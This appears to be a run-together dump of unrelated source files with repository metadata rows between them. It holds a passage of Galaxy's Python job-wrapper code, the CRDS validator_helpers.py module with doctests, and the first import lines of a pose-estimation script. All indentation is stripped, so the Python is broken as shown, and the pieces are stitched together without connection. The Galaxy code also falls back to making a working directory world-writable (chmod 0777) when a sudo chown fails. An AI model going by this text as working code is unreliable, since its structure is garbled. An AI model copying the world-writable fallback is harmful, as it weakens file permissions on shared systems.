log.info( "Collecting job metrics for %s" % has_metrics )
for plugin, properties in per_plugin_properties.iteritems():
for metric_name, metric_value in properties.iteritems():
if metric_value is not None:
has_metrics.add_metric( plugin, metric_name, metric_value )
def get_output_sizes( self ):
sizes = []
output_paths = self.get_output_fnames()
for outfile in [ str( o ) for o in output_paths ]:
if os.path.exists( outfile ):
sizes.append( ( outfile, os.stat( outfile ).st_size ) )
else:
sizes.append( ( outfile, 0 ) )
return sizes
def check_limits(self, runtime=None):
if self.app.job_config.limits.output_size > 0:
for outfile, size in self.get_output_sizes():
if size > self.app.job_config.limits.output_size:
log.warning( '(%s) Job output size %s has exceeded the global output size limit', self.get_id_tag(), os.path.basename( outfile ) )
return JobState.runner_states.OUTPUT_SIZE_LIMIT, 'Job output file grew too large (greater than %s), please try different inputs or parameters' % util.nice_size( self.app.job_config.limits.output_size )
if self.app.job_config.limits.walltime_delta is not None and runtime is not None:
if runtime > self.app.job_config.limits.walltime_delta:
log.warning( '(%s) Job runtime %s has exceeded the global walltime, it will be terminated', self.get_id_tag(), runtime )
return JobState.runner_states.GLOBAL_WALLTIME_REACHED, 'Job ran longer than the maximum allowed execution time (runtime: %s, limit: %s), please try different inputs or parameters' % ( str(runtime).split('.')[0], self.app.job_config.limits.walltime )
return None
def has_limits( self ):
has_output_limit = self.app.job_config.limits.output_size > 0
has_walltime_limit = self.app.job_config.limits.walltime_delta is not None
return has_output_limit or has_walltime_limit
def get_command_line( self ):
return self.command_line
def get_session_id( self ):
return self.session_id
def get_env_setup_clause( self ):
if self.app.config.environment_setup_file is None:
return ''
return '[ -f "%s" ] && . %s' % ( self.app.config.environment_setup_file, self.app.config.environment_setup_file )
def get_input_dataset_fnames( self, ds ):
filenames = []
filenames = [ ds.file_name ]
#we will need to stage in metadata file names also
#TODO: would be better to only stage in metadata files that are actually needed (found in command line, referenced in config files, etc.)
for key, value in ds.metadata.items():
if isinstance( value, model.MetadataFile ):
filenames.append( value.file_name )
return filenames
def get_input_fnames( self ):
job = self.get_job()
filenames = []
for da in job.input_datasets + job.input_library_datasets: # da is JobToInputDatasetAssociation object
if da.dataset:
filenames.extend(self.get_input_dataset_fnames(da.dataset))
return filenames
def get_input_paths( self, job=None ):
if job is None:
job = self.get_job()
paths = []
for da in job.input_datasets + job.input_library_datasets: # da is JobToInputDatasetAssociation object
if da.dataset:
filenames = self.get_input_dataset_fnames(da.dataset)
for real_path in filenames:
false_path = self.dataset_path_rewriter.rewrite_dataset_path( da.dataset, 'input' )
paths.append( DatasetPath( da.id, real_path=real_path, false_path=false_path, mutable=False ) )
return paths
def get_output_fnames( self ):
if self.output_paths is None:
self.compute_outputs()
return self.output_paths
def get_mutable_output_fnames( self ):
if self.output_paths is None:
self.compute_outputs()
return filter( lambda dsp: dsp.mutable, self.output_paths )
def get_output_hdas_and_fnames( self ):
if self.output_hdas_and_paths is None:
self.compute_outputs()
return self.output_hdas_and_paths
def compute_outputs( self ) :
dataset_path_rewriter = self.dataset_path_rewriter
job = self.get_job()
# Job output datasets are combination of history, library, and jeha datasets.
special = self.sa_session.query( model.JobExportHistoryArchive ).filter_by( job=job ).first()
false_path = None
results = []
for da in job.output_datasets + job.output_library_datasets:
da_false_path = dataset_path_rewriter.rewrite_dataset_path( da.dataset, 'output' )
mutable = da.dataset.dataset.external_filename is None
dataset_path = DatasetPath( da.dataset.dataset.id, da.dataset.file_name, false_path=da_false_path, mutable=mutable )
results.append( ( da.name, da.dataset, dataset_path ) )
self.output_paths = [t[2] for t in results]
self.output_hdas_and_paths = dict([(t[0], t[1:]) for t in results])
if special:
false_path = dataset_path_rewriter.rewrite_dataset_path( special.dataset, 'output' )
dsp = DatasetPath( special.dataset.id, special.dataset.file_name, false_path )
self.output_paths.append( dsp )
return self.output_paths
def get_output_file_id( self, file ):
if self.output_paths is None:
self.get_output_fnames()
for dp in self.output_paths:
if self.app.config.outputs_to_working_directory and os.path.basename( dp.false_path ) == file:
return dp.dataset_id
elif os.path.basename( dp.real_path ) == file:
return dp.dataset_id
return None
def get_tool_provided_job_metadata( self ):
if self.tool_provided_job_metadata is not None:
return self.tool_provided_job_metadata
# Look for JSONified job metadata
self.tool_provided_job_metadata = []
meta_file = os.path.join( self.working_directory, TOOL_PROVIDED_JOB_METADATA_FILE )
if os.path.exists( meta_file ):
for line in open( meta_file, 'r' ):
try:
line = loads( line )
assert 'type' in line
except:
log.exception( '(%s) Got JSON data from tool, but data is improperly formatted or no "type" key in data' % self.job_id )
log.debug( 'Offending data was: %s' % line )
continue
# Set the dataset id if it's a dataset entry and isn't set.
# This isn't insecure. We loop the job's output datasets in
# the finish method, so if a tool writes out metadata for a
# dataset id that it doesn't own, it'll just be ignored.
if line['type'] == 'dataset' and 'dataset_id' not in line:
try:
line['dataset_id'] = self.get_output_file_id( line['dataset'] )
except KeyError:
log.warning( '(%s) Tool provided job dataset-specific metadata without specifying a dataset' % self.job_id )
continue
self.tool_provided_job_metadata.append( line )
return self.tool_provided_job_metadata
def get_dataset_finish_context( self, job_context, dataset ):
for meta in self.get_tool_provided_job_metadata():
if meta['type'] == 'dataset' and meta['dataset_id'] == dataset.id:
return ExpressionContext( meta, job_context )
return job_context
def setup_external_metadata( self, exec_dir=None, tmp_dir=None, dataset_files_path=None, config_root=None, config_file=None, datatypes_config=None, set_extension=True, **kwds ):
# extension could still be 'auto' if this is the upload tool.
job = self.get_job()
if set_extension:
for output_dataset_assoc in job.output_datasets:
if output_dataset_assoc.dataset.ext == 'auto':
context = self.get_dataset_finish_context( dict(), output_dataset_assoc.dataset.dataset )
output_dataset_assoc.dataset.extension = context.get( 'ext', 'data' )
self.sa_session.flush()
if tmp_dir is None:
#this dir should should relative to the exec_dir
tmp_dir = self.app.config.new_file_path
if dataset_files_path is None:
dataset_files_path = self.app.model.Dataset.file_path
if config_root is None:
config_root = self.app.config.root
if config_file is None:
config_file = self.app.config.config_file
if datatypes_config is None:
datatypes_config = self.app.datatypes_registry.integrated_datatypes_configs
return self.external_output_metadata.setup_external_metadata( [ output_dataset_assoc.dataset for output_dataset_assoc in job.output_datasets + job.output_library_datasets ],
self.sa_session,
exec_dir=exec_dir,
tmp_dir=tmp_dir,
dataset_files_path=dataset_files_path,
config_root=config_root,
config_file=config_file,
datatypes_config=datatypes_config,
job_metadata=os.path.join( self.working_directory, TOOL_PROVIDED_JOB_METADATA_FILE ),
**kwds )
@property
def user( self ):
job = self.get_job()
if job.user is not None:
return job.user.email
elif job.galaxy_session is not None and job.galaxy_session.user is not None:
return job.galaxy_session.user.email
elif job.history is not None and job.history.user is not None:
return job.history.user.email
elif job.galaxy_session is not None:
return 'anonymous@' + job.galaxy_session.remote_addr.split()[-1]
else:
return 'anonymous@unknown'
def __link_file_check( self ):
""" outputs_to_working_directory breaks library uploads where data is
linked. This method is a hack that solves that problem, but is
specific to the upload tool and relies on an injected job param. This
method should be removed ASAP and replaced with some properly generic
and stateful way of determining link-only datasets. -nate
"""
job = self.get_job()
param_dict = job.get_param_values( self.app )
return self.tool.id == 'upload1' and param_dict.get( 'link_data_only', None ) == 'link_to_files'
def _change_ownership( self, username, gid ):
job = self.get_job()
# FIXME: hardcoded path
cmd = [ '/usr/bin/sudo', '-E', self.app.config.external_chown_script, self.working_directory, username, str( gid ) ]
log.debug( '(%s) Changing ownership of working directory with: %s' % ( job.id, ' '.join( cmd ) ) )
p = subprocess.Popen( cmd, shell=False, stdout=subprocess.PIPE, stderr=subprocess.PIPE )
# TODO: log stdout/stderr
stdout, stderr = p.communicate()
assert p.returncode == 0
def change_ownership_for_run( self ):
job = self.get_job()
if self.app.config.external_chown_script and job.user is not None:
try:
self._change_ownership( self.user_system_pwent[0], str( self.user_system_pwent[3] ) )
except:
log.exception( '(%s) Failed to change ownership of %s, making world-writable instead' % ( job.id, self.working_directory ) )
os.chmod( self.working_directory, 0777 )
def reclaim_ownership( self ):
job = self.get_job()
if self.app.config.external_chown_script and job.user is not None:
self._change_ownership( self.galaxy_system_pwent[0], str( self.galaxy_system_pwent[3] ) )
@property
def user_system_pwent( self ):
if self.__user_system_pwent is None:
job = self.get_job()
try:
self.__user_system_pwent = pwd.getpwnam( job.user.email.split('@')[0] )
except:
pass
return self.__user_system_pwent
@property
def galaxy_system_pwent( self ):
if self.__galaxy_system_pwent is None:
self.__galaxy_system_pwent = pwd.getpwuid(os.getuid())
return self.__galaxy_system_pwent
def get_output_destination( self, output_path ):
"""
Destination for outputs marked as from_work_dir. This is the normal case,
just copy these files directly to the ulimate destination.
"""
return output_path
@property
def requires_setting_metadata( self ):
if self.tool:
return self.tool.requires_setting_metadata
return False
class TaskWrapper(JobWrapper):
"""
Extension of JobWrapper intended for running tasks.
Should be refactored into a generalized executable unit wrapper parent, then jobs and tasks.
"""
# Abstract this to be more useful for running tasks that *don't* necessarily compose a job.
def __init__(self, task, queue):
super(TaskWrapper, self).__init__(task.job, queue)
self.task_id = task.id
working_directory = task.working_directory
self.working_directory = working_directory
job_dataset_path_rewriter = self._job_dataset_path_rewriter( self.working_directory )
self.dataset_path_rewriter = TaskPathRewriter( working_directory, job_dataset_path_rewriter )
if task.prepare_input_files_cmd is not None:
self.prepare_input_files_cmds = [ task.prepare_input_files_cmd ]
else:
self.prepare_input_files_cmds = None
self.status = task.states.NEW
def can_split( self ):
# Should the job handler split this job up? TaskWrapper should
# always return False as the job has already been split.
return False
def get_job( self ):
if self.job_id:
return self.sa_session.query( model.Job ).get( self.job_id )
else:
return None
def get_task( self ):
return self.sa_session.query(model.Task).get(self.task_id)
def get_id_tag(self):
# For compatibility with drmaa job runner and TaskWrapper, instead of using job_id directly
return self.get_task().get_id_tag()
def get_param_dict( self ):
"""
Restore the dictionary of parameters from the database.
"""
job = self.sa_session.query( model.Job ).get( self.job_id )
param_dict = dict( [ ( p.name, p.value ) for p in job.parameters ] )
param_dict = self.tool.params_from_strings( param_dict, self.app )
return param_dict
def prepare( self, compute_environment=None ):
"""
Prepare the job to run by creating the working directory and the
config files.
"""
# Restore parameters from the database
job = self._load_job()
task = self.get_task()
# DBTODO New method for generating command line for a task?
tool_evaluator = self._get_tool_evaluator( job )
compute_environment = compute_environment or self.default_compute_environment( job )
tool_evaluator.set_compute_environment( compute_environment )
self.sa_session.flush()
self.command_line, self.extra_filenames = tool_evaluator.build()
# FIXME: for now, tools get Galaxy's lib dir in their path
if self.command_line and self.command_line.startswith( 'python' ):
self.galaxy_lib_dir = os.path.abspath( "lib" ) # cwd = galaxy root
# Shell fragment to inject dependencies
self.dependency_shell_commands = self.tool.build_dependency_shell_commands()
# We need command_line persisted to the db in order for Galaxy to re-queue the job
# if the server was stopped and restarted before the job finished
task.command_line = self.command_line
self.sa_session.add( task )
self.sa_session.flush()
self.param_dict = tool_evaluator.param_dict
self.status = 'prepared'
return self.extra_filenames
def fail( self, message, exception=False ):
log.error("TaskWrapper Failure %s" % message)
self.status = 'error'
# How do we want to handle task failure? Fail the job and let it clean up?
def change_state( self, state, info=False ):
task = self.get_task()
self.sa_session.refresh( task )
if info:
task.info = info
task.state = state
self.sa_session.add( task )
self.sa_session.flush()
def get_state( self ):
task = self.get_task()
self.sa_session.refresh( task )
return task.state
def get_exit_code( self ):
task = self.get_task()
self.sa_session.refresh( task )
return task.exit_code
def set_runner( self, runner_url, external_id ):
task = self.get_task()
self.sa_session.refresh( task )
task.task_runner_name = runner_url
task.task_runner_external_id = external_id
# DBTODO Check task job_runner_stuff
self.sa_session.add( task )
self.sa_session.flush()
def finish( self, stdout, stderr, tool_exit_code=None ):
# DBTODO integrate previous finish logic.
# Simple finish for tasks. Just set the flag OK.
"""
Called to indicate that the associated command has been run. Updates
the output datasets based on stderr and stdout from the command, and
the contents of the output files.
"""
stdout = unicodify( stdout )
stderr = unicodify( stderr )
# This may have ended too soon
log.debug( 'task %s for job %d ended; exit code: %d'
% (self.task_id, self.job_id,
tool_exit_code if tool_exit_code != None else -256 ) )
# default post job setup_external_metadata
self.sa_session.expunge_all()
task = self.get_task()
# if the job was deleted, don't finish it
if task.state == task.states.DELETED:
# Job was deleted by an administrator
delete_files = self.app.config.cleanup_job in ( 'always', 'onsuccess' )
self.cleanup( delete_files=delete_files )
return
elif task.state == task.states.ERROR:
self.fail( task.info )
return
# Check what the tool returned. If the stdout or stderr matched
# regular expressions that indicate errors, then set an error.
# The same goes if the tool's exit code was in a given range.
if ( self.check_tool_output( stdout, stderr, tool_exit_code, task ) ):
task.state = task.states.OK
else:
task.state = task.states.ERROR
# Save stdout and stderr
if len( stdout ) > DATABASE_MAX_STRING_SIZE:
log.error( "stdout for task %d is greater than %s, only a portion will be logged to database" % ( task.id, DATABASE_MAX_STRING_SIZE_PRETTY ) )
task.stdout = util.shrink_string_by_size( stdout, DATABASE_MAX_STRING_SIZE, join_by="\n..\n", left_larger=True, beginning_on_size_error=True )
if len( stderr ) > DATABASE_MAX_STRING_SIZE:
log.error( "stderr for task %d is greater than %s, only a portion will be logged to database" % ( task.id, DATABASE_MAX_STRING_SIZE_PRETTY ) )
self._collect_metrics( task )
task.stderr = util.shrink_string_by_size( stderr, DATABASE_MAX_STRING_SIZE, join_by="\n..\n", left_larger=True, beginning_on_size_error=True )
task.exit_code = tool_exit_code
task.command_line = self.command_line
self.sa_session.flush()
def cleanup( self ):
# There is no task cleanup. The job cleans up for all tasks.
pass
def get_command_line( self ):
return self.command_line
def get_session_id( self ):
return self.session_id
def get_output_file_id( self, file ):
# There is no permanent output file for tasks.
return None
def get_tool_provided_job_metadata( self ):
# DBTODO Handle this as applicable for tasks.
return None
def get_dataset_finish_context( self, job_context, dataset ):
# Handled at the parent job level. Do nothing here.
pass
def setup_external_metadata( self, exec_dir=None, tmp_dir=None, dataset_files_path=None, config_root=None, config_file=None, datatypes_config=None, set_extension=True, **kwds ):
# There is no metadata setting for tasks. This is handled after the merge, at the job level.
return ""
def get_output_destination( self, output_path ):
"""
Destination for outputs marked as from_work_dir. These must be copied with
the same basenme as the path for the ultimate output destination. This is
required in the task case so they can be merged.
"""
return os.path.join( self.working_directory, os.path.basename( output_path ) )
class ComputeEnvironment( object ):
""" Definition of the job as it will be run on the (potentially) remote
compute server.
"""
__metaclass__ = ABCMeta
@abstractmethod
def output_paths( self ):
""" Output DatasetPaths defined by job. """
@abstractmethod
def input_paths( self ):
""" Input DatasetPaths defined by job. """
@abstractmethod
def working_directory( self ):
""" Job working directory (potentially remote) """
@abstractmethod
def config_directory( self ):
""" Directory containing config files (potentially remote) """
@abstractmethod
def sep( self ):
""" os.path.sep for the platform this job will execute in.
"""
@abstractmethod
def new_file_path( self ):
""" Absolute path to dump new files for this job on compute server. """
@abstractmethod
def tool_directory( self ):
""" Absolute path to tool files for this job on compute server. """
@abstractmethod
def version_path( self ):
""" Location of the version file for the underlying tool. """
@abstractmethod
def unstructured_path_rewriter( self ):
""" Return a function that takes in a value, determines if it is path
to be rewritten (will be passed non-path values as well - onus is on
this function to determine both if its input is a path and if it should
be rewritten.)
"""
class SimpleComputeEnvironment( object ):
def config_directory( self ):
return self.working_directory( )
def sep( self ):
return os.path.sep
def unstructured_path_rewriter( self ):
return lambda v: v
class SharedComputeEnvironment( SimpleComputeEnvironment ):
""" Default ComputeEnviornment for job and task wrapper to pass
to ToolEvaluator - valid when Galaxy and compute share all the relevant
file systems.
"""
def __init__( self, job_wrapper, job ):
self.app = job_wrapper.app
self.job_wrapper = job_wrapper
self.job = job
def output_paths( self ):
return self.job_wrapper.get_output_fnames()
def input_paths( self ):
return self.job_wrapper.get_input_paths( self.job )
def working_directory( self ):
return self.job_wrapper.working_directory
def new_file_path( self ):
return os.path.abspath( self.app.config.new_file_path )
def version_path( self ):
return self.job_wrapper.get_version_string_path()
def tool_directory( self ):
return os.path.abspath(self.job_wrapper.tool.tool_dir)
class NoopQueue( object ):
"""
Implements the JobQueue / JobStopQueue interface but does nothing
"""
def put( self, *args, **kwargs ):
return
def put_stop( self, *args ):
return
def shutdown( self ):
return
class ParallelismInfo(object):
"""
Stores the information (if any) for running multiple instances of the tool in parallel
on the same set of inputs.
"""
def __init__(self, tag):
self.method = tag.get('method')
if isinstance(tag, dict):
items = tag.iteritems()
else:
items = tag.attrib.items()
self.attributes = dict( [ item for item in items if item[ 0 ] != 'method' ])
if len(self.attributes) == 0:
# legacy basic mode - provide compatible defaults
self.attributes['split_size'] = 20
self.attributes['split_mode'] = 'number_of_parts'
| 47.63806
| 301
| 0.622789
|
f0f9fd7d14ec89840015dd254fee46ceff0dc108
| 14,349
|
py
|
Python
|
crds/certify/validator_helpers.py
|
sean-lockwood/crds
|
f071f59deca98aac4bee04d688805a127761f3d2
|
[
"BSD-3-Clause"
] | null | null | null |
crds/certify/validator_helpers.py
|
sean-lockwood/crds
|
f071f59deca98aac4bee04d688805a127761f3d2
|
[
"BSD-3-Clause"
] | 1
|
2019-04-11T18:19:16.000Z
|
2019-04-11T18:19:16.000Z
|
crds/certify/validator_helpers.py
|
sean-lockwood/crds
|
f071f59deca98aac4bee04d688805a127761f3d2
|
[
"BSD-3-Clause"
] | null | null | null |
"""This module defines helper functions that are used in "expression" validators,
either in a "presence" condition or as the "constraint" condition. The expressions
themselves appear in .tpn files and are dynamically eval'ed in the context of a reference
header and other globals like these functions.
These functions are used to keep the .tpn expressions comparatively simple since those
are restricted to pigeon-Python that does not allow spaces. See the JWST .tpn files
(particularly *array*.tpn) for examples of presence or constraint expressions, grep
those files for these functions.
"""
from crds.core import utils, exceptions
# ----------------------------------------------------------------------------
# Table check expression helper functions
def has_columns(array_info, col_names):
"""Return True IFF CRDS `array_info` object defines `col_names` columns in any order.
>>> has_columns(utils.Struct(COLUMN_NAMES=["THIS","THAT","ANOTHER"]), ["THAT","ANOTHER","THIS"])
True
>>> has_columns(utils.Struct(COLUMN_NAMES=["THIS","THAT","ANOTHER"]), ["THAT","ANOTHER","FOO"])
False
>>> has_columns("UNDEFINED", ["THAT","ANOTHER","FOO"])
False
NOTE: does not disallow extra columns not listed.
"""
if not array_exists(array_info):
return False
for col in col_names:
if col not in array_info.COLUMN_NAMES:
return False
return True
def has_type(array_info, typestr):
"""Return True IFF CRDS `array_info` object has a data array of type `typestr`.
>>> has_type(utils.Struct({"DATA_TYPE" : "int8"}), "INT")
True
>>> has_type(utils.Struct({"DATA_TYPE" : "uint64"}), "INTEGER")
True
>>> has_type(utils.Struct({"DATA_TYPE" : "float64"}), "INTEGER")
False
>>> has_type(utils.Struct({"DATA_TYPE" : "float32"}), "FLOAT")
True
>>> has_type(utils.Struct({"DATA_TYPE" : "float32"}), "INT")
False
>>> has_type(utils.Struct({"DATA_TYPE" : "float64"}), "FLOAT")
True
>>> has_type(utils.Struct({"DATA_TYPE" : "complex32"}), "COMPLEX")
True
>>> has_type(utils.Struct({"DATA_TYPE" : "complex64"}), "COMPLEX")
True
>>> has_type(utils.Struct({"DATA_TYPE" : "complex64"}), "FLOAT")
False
>>> has_type(utils.Struct({"DATA_TYPE" : "complex64"}), ["FLOAT","INT"])
False
>>> has_type(utils.Struct({"DATA_TYPE" : "complex64"}), ["COMPLEX","INT"])
True
"""
possible_types = [typestr] if isinstance(typestr, str) else typestr
for possible_type in possible_types:
itype = _image_type(possible_type)
if array_exists(array_info) and itype in array_info.DATA_TYPE:
return True
return False
def _image_type(typestr):
"""Return the translation of CRDS fuzzy type name `typestr` into numpy dtype str() prefixes.
If CRDS has no definition for `typestr`, return it unchanged.
"""
return {
'COMPLEX':'complex',
'INT' : 'int',
'INTEGER' : 'int',
'FLOAT' : 'float',
'BOOLEAN' : 'bool'
}.get(typestr, typestr)
def has_column_type(array_info, col_name, typestr):
"""Return True IFF column `col_name` of CRDS `array_info` object has a
data array of type `typestr`.
>>> has_column_type(utils.Struct(DATA_TYPE={"WAVELENGTH":">f4"}), "WAVELENGTH", "FLOAT")
True
>>> has_column_type(utils.Struct(DATA_TYPE={"WAVELENGTH":">f4"}), "WAVELENGTH", "INTEGER")
False
>>> has_column_type("UNDEFINED", "WAVELENGTH", "INTEGER")
False
>>> has_column_type(utils.Struct(DATA_TYPE={"WAVELENGTH":">f4"}), "WAVELEN", "INTEGER")
Traceback (most recent call last):
...
crds.core.exceptions.MissingColumnError: Data type not defined for column 'WAVELEN'
"""
if not array_exists(array_info):
return False
typestrs = _table_type(typestr)
try:
for typestr in typestrs:
if typestr in array_info.DATA_TYPE[col_name.upper()]:
return True
return False
except KeyError:
pass
raise exceptions.MissingColumnError("Data type not defined for column", repr(col_name))
def _table_type(typestr):
"""Return the translation of CRDS fuzzy type name `typestr` into numpy dtype str() prefixes.
If CRDS has no definition for `typestr`, return it unchanged.
"""
int_types = [">i","<i","uint","int"]
float_types = [">f","<f","float","float"]
complex_types = [">c","<c","complex","complex"]
string_types = ["|S"]
def _array_types(types):
return ["('" + typestr for typestr in types]
trans = {
'COMPLEX': complex_types,
'COMPLEX_ARRAY': _array_types(complex_types),
'INT' : int_types,
'INTEGER' : int_types,
'INT_ARRAY' : _array_types(int_types),
'INTEGER_ARRAY' : _array_types(int_types),
'FLOAT' : float_types,
'FLOAT_ARRAY' : _array_types(float_types),
'STR' : string_types,
'STRING' : string_types,
'STR_ARRAY' : _array_types(string_types),
'STRING_ARRAY' : _array_types(string_types),
}.get(typestr, typestr)
return trans
def is_table(array_info):
"""Return True IFF CRDS `array_info` object corresponds to a table.
>>> is_table(utils.Struct(KIND="IMAGE"))
False
>>> is_table(utils.Struct(KIND="TABLE"))
True
"""
return array_exists(array_info) and array_info.KIND=="TABLE"
def is_image(array_info):
"""Return True IFF CRDS `array_info` object corresponds to an image.
>>> is_image(utils.Struct(KIND="IMAGE"))
True
>>> is_image(utils.Struct(KIND="TABLE"))
False
"""
return array_exists(array_info) and array_info.KIND=="IMAGE"
def array_exists(array_info):
"""Return True IFF array_info is not UNDEFINED.
>>> array_exists("UNDEFINED")
False
>>> array_exists(utils.Struct({"KIND":"IMAGE", "SHAPE" : (2048,2048), "TYPE": "float32"}))
True
"""
return array_info != "UNDEFINED"
def is_imaging_mode(exp_type):
"""Return True IFF `exp_type` is one of the imaging modes for any instrument.
>>> is_imaging_mode('MIR_IMAGE')
True
>>> is_imaging_mode("NRS_IFU")
False
"""
return exp_type in ["NRC_IMAGE", "NRC_TACQ", "NRC_TACONF", "NRC_CORON", "NRC_TSIMAGE",
"NRC_FOCUS", "NRC_DARK", "NRC_FLAT", "NRC_LED",
"MIR_IMAGE", "MIR_TACQ", "MIR_LYOT", "MIR_4QPM", "MIR_DARK",
"MIR_FLATIMAGE", "MIR_CORONCAL",
"NRS_TASLIT", "NRS_TACQ", "NRS_TACONFIRM",
"NRS_CONFIRM", "NRS_IMAGE", "NRS_FOCUS", "NRS_DARK", "NRS_MIMF",
"NIS_IMAGE", "NIS_TACQ", "NIS_TACONFIRM", "NIS_AMI",
"NIS_FOCUS", "NIS_DARK", "NIS_LAMP",
"FGS_IMAGE", "FGS_FOCUS", "FGS_SKYFLAT", "FGS_INTFLAT", "FGS_DARK", "FGS_ID-STACK"]
def is_full_frame(subarray):
"""Return True IFF `subarray` is defined and has a full frame subarray value.
>>> is_full_frame("UNDEFINED")
False
>>> is_full_frame("FULL")
True
>>> is_full_frame("GENERIC")
True
>>> is_full_frame("N/A")
True
>>> is_full_frame("ANY")
True
>>> is_full_frame("*")
True
>>> is_full_frame("MASK1140")
False
>>> is_full_frame("BRIGHTSKY")
False
"""
return subarray in ["FULL","GENERIC","N/A","ANY","*"]
def is_subarray(subarray):
"""Return True IFF `subarray` is defined and is not a full frame value.
>>> is_subarray("UNDEFINED")
False
>>> is_subarray("GENERIC")
False
>>> is_subarray("N/A")
False
>>> is_subarray("ANY")
False
>>> is_subarray("*")
False
>>> is_subarray("FULL")
False
>>> is_subarray("MASK1140")
True
>>> is_subarray("BRIGHTSKY")
True
"""
return (subarray != "UNDEFINED") and not is_full_frame(subarray)
def subarray_defined(header):
"""Return True IFF SUBARRAY related keywords are defined.
>>> header = dict(SUBARRAY="GENERIC",SUBSTRT1="1",SUBSTRT2="1",SUBSIZE1="2048",SUBSIZE2="2048")
>>> subarray_defined(header)
True
>>> header = dict(SUBARRAY="GENERIC",SUBSTRT1="1",SUBSTRT2="1",SUBISIZE2="2048")
>>> subarray_defined(header)
False
"""
for keyword in ["SUBARRAY","SUBSTRT1","SUBSTRT2","SUBSIZE1","SUBSIZE2"]:
value = header.get(keyword,"UNDEFINED")
if value == "UNDEFINED":
return False
return True
def is_irs2(readpatt):
"""Return True IFF `readpatt` is one of the IRS2 READPATTs.
>>> is_irs2("NRSIRS2")
True
>>> is_irs2("NRSIRS2RAPID")
True
>>> is_irs2("NRSN32R8")
False
>>> is_irs2("ALLIRS2")
True
"""
return 'IRS2' in readpatt
def is_defined(value):
"""Return True IFF `value` is not 'UNDEFINED' or None.
>>> is_defined("UNDEFINED")
False
>>> is_defined(None)
False
>>> is_defined("FOO")
True
"""
return value not in ["UNDEFINED", None]
# # @utils.traced
# def nir_filter(instrument, reftype, exp_type):
# """Return True if a SCI, ERR, or DQ array is appropriate for the specified
# JWST NIR instrument, reftype, and exp_type. This can be used to filter
# out NIR SCI,ERR,DQ array definitions for those NIRSPEC modes and types
# that don't define them. The logic is too complex to inline.
#
# >>> nir_filter("NIRSPEC", "SFLAT", "NRS_MSASPEC")
# True
# >>> nir_filter("NIRSPEC", "SFLAT", "NRS_IFU")
# True
# >>> nir_filter("NIRSPEC", "SFLAT", "NRS_FIXEDSLIT")
# False
# >>> nir_filter("NIRSPEC", "SFLAT", "NRS_BRIGHTOBJ")
# False
#
# >>> nir_filter("NIRSPEC", "DFLAT", "ANY")
# True
#
# >>> nir_filter("NIRSPEC", "FFLAT", "NRS_MSASPEC")
# True
# >>> nir_filter("NIRSPEC", "FFLAT", "NRS_IFU")
# False
# >>> nir_filter("NIRSPEC", "FFLAT", "NRS_FIXEDSLIT")
# False
# >>> nir_filter("NIRSPEC", "FFLAT", "NRS_BRIGTOBJ")
# False
#
# """
# assert instrument != "MIRI", "nir_filter() .tpn function should only be called for NIR-detector based instruments."
# if instrument == "NIRSPEC":
# if reftype == "SFLAT":
# return exp_type in ["NRS_MSASPEC","NRS_IFU"]
# elif reftype == "DFLAT":
# return True
# elif reftype == "FFLAT":
# return exp_type in ["NRS_MSASPEC"]
# elif reftype == "AREA":
# return is_imaging_mode(exp_type)
# else:
# return True
# else:
# return True
# ----------------------------------------------------------------------------
# These are presence field helpers that mutate a True value of a presence expression
# into one of the non-boolean presence flags. This enables combining presence values
# like "O" with presence expressions. In general, when an expression is True then
# the presence character of the wrapper helper is returned, e.g.:
#
# (OPTIONAL(True)) --> "O"
# (OPTIONAL(False)) --> False, constraint not evaluated.
#
# The enables having constraints which are conditionally optional, so e.g. a constraint
# on
def optional(flag=True):
"""When this flag is True, an exception should be issued if the related keyword/element is
defined and the constraint fails. If the keyword/element is not defined or `flag` is False,
the constraint should be ignored. Returns "O" or False
>>> optional(True)
'O'
>>> optional(False)
False
"""
return "O" if flag else False
def required(flag=True):
"""When this flag is True, an exception should be issued if the related keyword/element is
not defined. Returns "R" or False.
>>> required(True)
'R'
>>> required(False)
False
"""
return "R" if flag else False
def warning(flag=True):
"""Presence condition mutator/wrapper:
When flag is True, a warning should be issued if the related keyword/element is
not defined. Returns "W" or False.
>>> warning(True)
'W'
>>> warning(False)
False
"""
return "W" if flag else False
def warn_only(flag):
"""Expression constraint mutator/wrapper:
When flag is True, the wrapped expression was satisifed, so return True
signaling a passed validator expression.
If the flag is False, the expression evaluated successfully but was not
satisified. Return the value "W" signaling that only a warning should be
issued rather than an exception or error.
>>> warn_only(True)
True
>>> warn_only(False)
'W'
"""
return "W" if not flag else True
def subarray(flag=True):
"""When this flag is True, the related constraint should be applied if
is_full_frame(SUBARRAY) is False. Returns "S" or False.
>>> subarray(True)
'S'
>>> subarray(False)
False
"""
return "S" if flag else False
def full_frame(flag=True):
"""When this flag is True, the related constraint should be applied if
is_full_frame(SUBARRAY) is True. Returns "F" or False.
>>> full_frame(True)
'F'
>>> full_frame(False)
False
"""
return "F" if flag else False
def all_subarray(flag=True):
"""When `flag` is True, mark this constraint as applying to all SUBARRAY forms,
including full frame, as long as SUBARRAY is defined. Returns "A" or False.
>>> all_subarray(True)
'A'
>>> all_subarray(False)
False
"""
return "A" if flag else False
# ----------------------------------------------------------------------------
def ndim(array, dims):
"""Return True IFF CRDS `array` object has number of dimensions `dims`.
>>> array = utils.Struct({"KIND":"IMAGE", "SHAPE" : (2048,2048), "TYPE": "float32"})
>>> ndim(array, 2)
True
>>> ndim(array, 3)
False
"""
return len(array.SHAPE) == dims
# ----------------------------------------------------------------------------
def test():
import doctest
from crds.certify import validator_helpers
return doctest.testmod(validator_helpers)
if __name__ == "__main__":
print(test())
| 31.605727
| 122
| 0.602899
|
2e20cff6622c53d6954e4102d4682605c41a9285
| 4,175
|
py
|
Python
|
pose.py
|
ecr23xx/kp6d
|
aef34c7893f06a93f8af5241ed4bbe36bf5dc884
|
[
"MIT"
] | 3
|
2019-10-14T06:16:44.000Z
|
2020-01-30T19:25:48.000Z
|
pose.py
|
ECer23/kp6d
|
aef34c7893f06a93f8af5241ed4bbe36bf5dc884
|
[
"MIT"
] | 1
|
2019-11-23T13:19:25.000Z
|
2019-11-25T13:06:16.000Z
|
pose.py
|
ECer23/kp6d
|
aef34c7893f06a93f8af5241ed4bbe36bf5dc884
|
[
"MIT"
] | 2
|
2019-08-09T18:34:23.000Z
|
2019-11-21T01:54:47.000Z
|
import os
import sys
import cv2
import pickle
import argparse
from tqdm import tqdm
from PIL import Image, ImageDraw
from torchvision import transforms
from utils import *
from data.linemod.sixd import SixdToolkit
from detect.eval.src.detector import Detector
from detect.eval.src.dataset import prepare_dataset
